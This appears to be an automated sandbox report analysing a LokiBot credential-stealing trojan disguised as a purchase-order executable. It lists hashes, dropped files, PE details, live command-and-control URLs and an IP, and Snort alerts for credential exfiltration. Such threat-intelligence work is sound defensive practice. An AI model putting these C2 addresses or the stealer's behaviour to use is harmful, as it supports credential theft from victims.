              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Purchase Order #5000012803.exe26%ReversingLabsWin32.Backdoor.Androm
              Purchase Order #5000012803.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              0.2.Purchase Order #5000012803.exe.22d0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.1.Purchase Order #5000012803.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
              1.0.Purchase Order #5000012803.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.2.Purchase Order #5000012803.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://slimpackage.com/slimfit/five/fre.php100%Avira URL Cloudmalware
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              slimpackage.com
              		104.223.93.105
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://slimpackage.com/slimfit/five/fre.phptrue
                • Avira URL Cloud: malware
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_ErrorPurchase Order #5000012803.exefalse
                  		high
                  http://nsis.sf.net/NSIS_ErrorErrorPurchase Order #5000012803.exefalse
                    		high
                    http://www.ibsensoftware.com/Purchase Order #5000012803.exe, Purchase Order #5000012803.exe, 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Purchase Order #5000012803.exe, 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    104.223.93.105
                    		slimpackage.comUnited States
                    		8100ASN-QUADRANET-GLOBALUStrue

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:553040
                    Start date:14.01.2022
                    Start time:07:14:14
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 28s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:Purchase Order #5000012803.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:17
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/6@61/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 89.7% (good quality ratio 87%)
                    • Quality average: 80.7%
                    • Quality standard deviation: 26.7%
                    HCA Information:
                    • Successful, ratio: 88%
                    • Number of executed functions: 63
                    • Number of non-executed functions: 38
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 23.211.6.115
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, settings-win.data.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: Purchase Order #5000012803.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    07:15:17API Interceptor58x Sleep call for process: Purchase Order #5000012803.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    104.223.93.105Trasferimento.vbsGet hashmaliciousBrowse
                    • nofearsw.in/cgi-sys/suspendedpage.cgi
                    EL1aBD5Zqr.exeGet hashmaliciousBrowse
                    • nofearsw.in/swo/inc/11828554f46a7d.php
                    TnUFqujldH.exeGet hashmaliciousBrowse
                    • nofearsw.in/swo/inc/11828554f46a7d.php
                    20210711494754.vbsGet hashmaliciousBrowse
                    • nofearsw.in/fen/inc/9fa099d0b6dea5.php
                    msg001.vbsGet hashmaliciousBrowse
                    • nofearsw.in/swo/inc/11828554f46a7d.php
                    Chuyen giao,pdf.vbsGet hashmaliciousBrowse
                    • nofearsw.in/swo/inc/11828554f46a7d.php
                    Dekont.vbsGet hashmaliciousBrowse
                    • nofearsw.in/swo/inc/11828554f46a7d.php
                    3Bws6ne7Ye.exeGet hashmaliciousBrowse
                    • jlpack.email/file/Panel/five/fre.php
                    filDHjBKef.exeGet hashmaliciousBrowse
                    • jlpack.email/grace/Panel/five/fre.php

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    ASN-QUADRANET-GLOBALUSpayload1.exeGet hashmaliciousBrowse
                    • 72.11.157.208
                    81LeRZW5BdGet hashmaliciousBrowse
                    • 45.199.228.213
                    27mfOKe6HtGet hashmaliciousBrowse
                    • 162.220.9.180
                    Antisocial.armGet hashmaliciousBrowse
                    • 45.199.228.220
                    BoFA_Remittance Advice.BoFA00002251.xlsbGet hashmaliciousBrowse
                    • 104.223.119.167
                    b0Ht6p5D1JGet hashmaliciousBrowse
                    • 23.156.2.11
                    Payment Remittance Advice_000000202213.xlsbGet hashmaliciousBrowse
                    • 104.223.119.167
                    5aUrqt6CKTGet hashmaliciousBrowse
                    • 154.205.102.18
                    Dm2sVBT0DWGet hashmaliciousBrowse
                    • 45.199.228.242
                    arm7Get hashmaliciousBrowse
                    • 23.153.31.214
                    armGet hashmaliciousBrowse
                    • 23.153.31.218
                    UvGeBNTPpT.exeGet hashmaliciousBrowse
                    • 67.215.246.10
                    7ega.x86Get hashmaliciousBrowse
                    • 104.247.190.160
                    yB9IhcEMywGet hashmaliciousBrowse
                    • 204.152.199.240
                    Fourloko.arm-20211230-1450Get hashmaliciousBrowse
                    • 45.199.228.235
                    abcGet hashmaliciousBrowse
                    • 155.94.205.13
                    arm7Get hashmaliciousBrowse
                    • 45.199.228.221
                    knwX1OWtYZGet hashmaliciousBrowse
                    • 173.205.82.82
                    3EslvuDWavGet hashmaliciousBrowse
                    • 162.220.9.50
                    FVz9CuT04eGet hashmaliciousBrowse
                    • 154.205.78.153

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\nnrr3w4buo
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):218882
                    Entropy (8bit):7.98965789846215
                    Encrypted:false
                    SSDEEP:6144:V9SOcYwR2fG8tEOnw6X/7CZJTrxSciuvI:DwEfLw6TCZpEyg
                    MD5:50A68BA520B64A2483798C97E223435F
                    SHA1:CBEAB844A1C3EAC2EB8ABE5DEF847A05FF9F7D5B
                    SHA-256:CD06A2C3858AC3B1BC6D06816DD2966154EABAB479C4B305521A84A5B409D6D7
                    SHA-512:8C604F64FE76D320D6749B9E36B3139E870534A4E0D159D5DF74A19CB5D5736A6215EFE95B7C8AFCC111521E107170C6B86F129385CD7B313C09331E7B53B84A
                    Malicious:false
                    Reputation:low
                    Preview: *8..6>.E.[L.a.....N.<s`3......|.}..).=A.}u..X.z......_k.5.Q...6;<Muz.L.....8F..Z...`^....Ys.tsnEF_X.W..5.p=..hmA..o....+V..;b..q.U.a......|4P..=.CD.....].w.[..N77f.3Wn.e../R..Ns.7...i...{*0eaxJ=X.e...g./Pw.R.....9..O......r.,..6...!.....74j..m7....fl...6A. w.L....KN.N.<s`.....}.|.1..).k=A.}u..X.S.q....jkR5KQ...A/BM.ID1$...K.s..ar.].......m^5.....0?yff>Q..^Q+....+....+V..;b.03eKDK=/...N564.@.a.. .(.L[A....aj,....q.D;...N........&...o.....hM*.V02.r.....iMz..Ry.....\jGK.x.~...!.....nh|jvq....fl...6>...[L*..M. 3n..s`.P...o.|...)vs=A.}u..X.z........Z.Q..._ABM#.D1....c....mr........._^.e....0?yf.>Q..`Q....,6....+V..;b.03eKDK./...N564.@.a.. .(.L[A....aj,....q.D;...N........&...o.....x.*.V02.r.....iMz..Ry.....\jGK..6...!.UD..ns|jv......fl...6>...[L....K..N.<s`{......|.}..).=A.}u..X.z......_k.5KQ....IBM.ID1$...K....mr........._^5.....0?yff>Q..^Q....,+....+V..;b.03eKDK=/...N564.@.a.. .(.L[A....aj,....q.D;...N........&...o.....x.*.V02.r.....iMz..Ry.....\jGK.
                    C:\Users\user\AppData\Local\Temp\nsgB0D.tmp
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):258678
                    Entropy (8bit):7.663931493685321
                    Encrypted:false
                    SSDEEP:6144:RS9SOcYwR2fG8tEOnw6X/7CZJTrxSciuvfN+:IwEfLw6TCZpEyXN
                    MD5:D993ADA5E7AEC7FDC7E5E62E31832EF9
                    SHA1:A7F68AC213855C6C80D38241F16076213724983F
                    SHA-256:918F6A726FBC8424E71E8B8CAF11E67B9B41D0DDC5C9C5DABA4B36889CB1D854
                    SHA-512:B955E01EFE5AD701396D5987A6545A896B8BB9FC2F34B10F03879648EDC3588AACDD74F6FD6C43B20A5BF89C0F99CFB71F79EB789E61DE77975148F86249AA14
                    Malicious:false
                    Reputation:low
                    Preview: .u......,.......................0Z.......u.......u..............................................................Z...........................................................................................................................................................................J...................j..............................................................................................................................._...........{...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):4.1417181736612125
                    Encrypted:false
                    SSDEEP:48:SpozIU0jblvgiPtv6UIkuW2yH+ZsQMR7/iItlRuqS:ZzWdvZNFuoH+Zdc5x
                    MD5:B70AAC2FFA041468D92918145535C5C7
                    SHA1:26F134E72D8E5C86209A54E0D05D801C1B193059
                    SHA-256:97ACCD2E535507EEAD8DA6CCDB641907134E527B19F9C64D6EF9071BFA508D66
                    SHA-512:561B10896C3539B87AA2C94CDAB5CEEC0379E56C4E949651ACDD114CEEFF18A1E3DD1A5E68E792D37B54BC47036395BF1ED883D852B5C03E3D8CB01CEFBD179A
                    Malicious:false
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x-2..Ca..Ca..CaZ.Ma..Ca..B`..Ca..Ba..Ca.lG`..Ca.lC`..Ca.l.a..Ca.lA`..CaRich..Ca........PE..L...C..a...........!......................... ...............................P............@.......................... ..H....!.......0.......................@..\.................................................... ...............................text............................... ..`.rdata..h.... ......................@..@.rsrc........0......................@..@.reloc..\....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\urpwvqane
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4972
                    Entropy (8bit):6.15619113991577
                    Encrypted:false
                    SSDEEP:96:Qm5+Ry+S1+aC5s+wjskAi0eXcKm5Z3p/yEaMr1L7h0MQOYRzJNUxwKjj:QmEI+S1dUs+hkAixMKA3padOYBJNUuKn
                    MD5:C7420C4BF0D9B154AF363B48CC160AD0
                    SHA1:D3C95A22A44E515830B925A2FC30B5FA6A0C628E
                    SHA-256:CAF8F4FFCA95FE9A5336A64B83554AEA6D37586A159F467D868E25F3737B4FB4
                    SHA-512:530FDA9B005576B408497D7B9E096B0CD526EA62B5D32039E4DE3CC3CEF1FCFABA2B7BB737C9662A4D0B990C7C0AAD673613BD83B56A66BCE1AC7D855E344F9C
                    Malicious:false
                    Reputation:low
                    Preview: .....TF.N.-^WRNd..R.g.....R.g....Nd....%...Nd...4..4.<........8..8T..4..4.<........8.}8T..4..4.<........8..8Ty.4..4.<.......8..8T.Nl..7+[.Uf.....H8..8T.F..N...x8..8..F..F..<....[....F...T.<..8..RW8d.N..[......N.!.&d..4...4}..4..U.4....4...4..D.1.b.F..b.8...N..4..4...F...8...d.......!.....N.!..Fd...F....VF.....TF.PP.R.g....F..F....>.F..F.F..F..8T.F...8..F..F.-F..8.F..FT.F.....e..j.5...._.....eg.j.g..........e...j.Q..........TF.N.%.R.g..........<..8..Nl..1.F....F..-8..F...8.........D.1.F..H[..fx.8...8Q..<..H[.....8...8Q..[.[.Uf..<....eg.j...........8...<....4......8..Nl..1.Nd..........F..F.....TF.N.-.R.g......%...<..8..Nl..1.F....F..-8..F...8.....n...D..A;...F..H[..fx.8...8Q..F..H[.....8...8Q..F..H[....8...8Q..F...x[..f..8...8...<..H[.....8...8Q..[.[.Uf..<...e..j...........8..Nl..1.F..F..8....4..4..4..4..4......8..Nl..1.Nd..........F..F.....TF.N........<..8..Nl..1.F....F..-8..F...8.....[...D.1.F..H[..fx.8...8Q..F..H[.....8...8Q..[.[.Uf..<....e...j.".....!...8....4
                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:D898504A722BFF1524134C6AB6A5EAA5
                    SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                    SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                    SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ..............................................

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.8958885048982035
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:Purchase Order #5000012803.exe
                    File size:247015
                    MD5:d62b8a5fdb90e9241ff0eef6ea035e32
                    SHA1:4e9e38dc4d01a649d927a933488477c5980fcb18
                    SHA256:95f5680fe4d7830a393aa84b2278051638f3c8105766c47a68c1f8981f38932b
                    SHA512:5878e0ab7e76e508499f14c077192a235a73312edaa030d0999370df6c82be56212e4258da19a8cf8f3417d0da8ba20b3e166e0b58611fc44194df2964e863fe
                    SSDEEP:6144:kw/b88QHR5lvQ2urEmJzKlf78z1++UPkq4Y1ROwy:HoRbQ2ugoz87oUPkqEwy
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                    File Icon

                    Icon Hash:ecccccd4d4e8e096

                    Static PE Info

                    General

                    Entrypoint:0x403225
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
                    Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:099c0646ea7282d232219f8807883be0

                    Entrypoint Preview

                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409128h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push 00008001h
                    call dword ptr [004070B4h]
                    push ebx
                    call dword ptr [0040727Ch]
                    push 00000008h
                    mov dword ptr [00423F58h], eax
                    call 00007F2930996230h
                    mov dword ptr [00423EA4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F450h
                    call dword ptr [00407158h]
                    push 004091B0h
                    push 004236A0h
                    call 00007F2930995EE7h
                    call dword ptr [004070B0h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F2930995ED5h
                    push ebx
                    call dword ptr [0040710Ch]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423EA0h], eax
                    mov eax, edi
                    jne 00007F29309936FCh
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F29309959C8h
                    push eax
                    call dword ptr [0040721Ch]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F2930993755h
                    cmp cl, 00000020h
                    jne 00007F29309936F8h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F29309936ECh
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [eax+eax+00h], 00000000h

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x2528.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc0x2c0000x25280x2600False0.407072368421data5.36381099372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x2c1f00x10a8dataEnglishUnited States
                    RT_ICON0x2d2980x988dataEnglishUnited States
                    RT_ICON0x2dc200x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                    RT_DIALOG0x2e0880x100dataEnglishUnited States
                    RT_DIALOG0x2e1880x11cdataEnglishUnited States
                    RT_DIALOG0x2e2a80x60dataEnglishUnited States
                    RT_GROUP_ICON0x2e3080x30dataEnglishUnited States
                    RT_MANIFEST0x2e3380x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                    Imports

                    DLLImport
                    KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    01/14/22-07:15:14.068204TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14976580192.168.2.4104.223.93.105
                    01/14/22-07:15:14.068204TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.4104.223.93.105
                    01/14/22-07:15:14.068204TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.4104.223.93.105
                    01/14/22-07:15:14.068204TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24976580192.168.2.4104.223.93.105
                    01/14/22-07:15:15.774786TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14976680192.168.2.4104.223.93.105
                    01/14/22-07:15:15.774786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.4104.223.93.105
                    01/14/22-07:15:15.774786TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.4104.223.93.105
                    01/14/22-07:15:15.774786TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24976680192.168.2.4104.223.93.105
                    01/14/22-07:15:17.010470TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.4104.223.93.105
                    01/14/22-07:15:17.010470TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.4104.223.93.105
                    01/14/22-07:15:17.010470TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.4104.223.93.105
                    01/14/22-07:15:17.010470TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.4104.223.93.105
                    01/14/22-07:15:18.393621TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.4104.223.93.105
                    01/14/22-07:15:18.393621TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.4104.223.93.105
                    01/14/22-07:15:18.393621TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.4104.223.93.105
                    01/14/22-07:15:18.393621TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.4104.223.93.105
                    01/14/22-07:15:19.695573TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.4104.223.93.105
                    01/14/22-07:15:19.695573TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.4104.223.93.105
                    01/14/22-07:15:19.695573TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.4104.223.93.105
                    01/14/22-07:15:19.695573TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.4104.223.93.105
                    01/14/22-07:15:21.323362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.4104.223.93.105
                    01/14/22-07:15:21.323362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.4104.223.93.105
                    01/14/22-07:15:21.323362TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.4104.223.93.105
                    01/14/22-07:15:21.323362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.4104.223.93.105
                    01/14/22-07:15:24.359164TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.4104.223.93.105
                    01/14/22-07:15:24.359164TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.4104.223.93.105
                    01/14/22-07:15:24.359164TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.4104.223.93.105
                    01/14/22-07:15:24.359164TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.4104.223.93.105
                    01/14/22-07:15:25.808698TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.4104.223.93.105
